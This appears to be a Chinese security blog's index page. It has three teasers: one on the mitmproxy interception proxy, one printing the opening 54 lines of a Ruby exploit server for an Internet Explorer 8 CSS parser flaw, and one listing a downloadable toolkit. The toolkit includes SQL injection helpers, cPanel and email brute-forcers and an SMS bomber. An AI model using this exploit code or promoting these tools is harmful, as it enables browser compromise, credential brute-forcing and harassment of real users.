mitmproxy

QQ20130628-2

mitmproxy是一款支持SSL的HTTP代理,它可以用于调试HTTP通信,发起中间人攻击等。mitmproxy提供了一个控制台接口用于动态拦 截和编辑HTTP数据包。mitmdump是mitmproxy的命令行版本,功能与其相同。

link:http://www.mitmproxy.org/
mitmproxy的主要特点:

Intercept and modify HTTP traffic on the fly

Save HTTP conversations for later replay and analysis

Replay both HTTP clients and servers

Make scripted changes to HTTP traffic using Python

SSL interception certs generated on the fly

Continue Reading

Internet Explorer 8 CSS Parser Exploit Code

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
#!/usr/bin/env ruby 
 
# Source: http://www.breakingpointsystems.com/community/blog/ie-vulnerability/ 
# Author: Nephi Johnson (d0c_s4vage) 
 
require 'socket'
 
def http_send(sock, data, opts={}) 
    defaults = {:code=>"200", :message=>"OK", :type=>"text/html"} 
    opts = defaults.merge(opts) 
 
    code = opts[:code] 
    message = opts[:message] 
    type = opts[:type] 
 
    to_send = "HTTP/1.1 #{code} #{message}\r\n" + 
              "Date: Sat, 11 Dec 2010 14:20:23 GMT\r\n" + 
              "Cache-Control: no-cache\r\n" + 
              "Content-Type: #{type}\r\n" + 
              "Pragma: no-cache\r\n" + 
              "Content-Length: #{data.length}\r\n\r\n" + 
              "#{data}"
    puts "[+] Sending:"
    to_send.split("\n").each do |line| 
        puts "    #{line}"
    end
    sock.write(to_send) rescue return false
    return true
end
 
def sock_read(sock, out_str, timeout=5) 
    begin
        if Kernel.select([sock],[],[],timeout) 
            out_str.replace(sock.recv(1024)) 
            puts "[+] Received:"
            out_str.split("\n").each do |line| 
                puts "    #{line}"
            end
        else
            sock.close 
            return false
        end
    rescue Exception => ex 
        return false
    end
end
 
def to_uni(str) 
    res = ""
    str.each_byte do |b| 
        res < < "\x00#{b.chr}"
    end
    res 
end
Continue Reading

Reiluke tools(include SQlIhelper 2.7)

File List:

2009-02-12  09:33    <DIR>          admin finder
2009-02-16  10:25    <DIR>          blind Sqli
2009-02-12  10:03    <DIR>          cpanel bruteforcer
2009-02-12  09:53    <DIR>          duplicate remover
2009-02-12  09:52    <DIR>          email brute
2009-02-16  10:25    <DIR>          email checker
2009-02-12  10:01    <DIR>          exploit scanner
2009-02-12  10:04    <DIR>          php rapidshare checker
2009-02-12  09:57    <DIR>          rapidshare checker
2009-02-12  09:36    <DIR>          sms bomber
2009-02-12  09:54    <DIR>          sqli column counter
2009-09-01  10:50    <DIR>          sqliHelper 2.7
2009-02-12  10:02    <DIR>          steam checker

Download link1~~ Download link2~~(offical link)

Continue Reading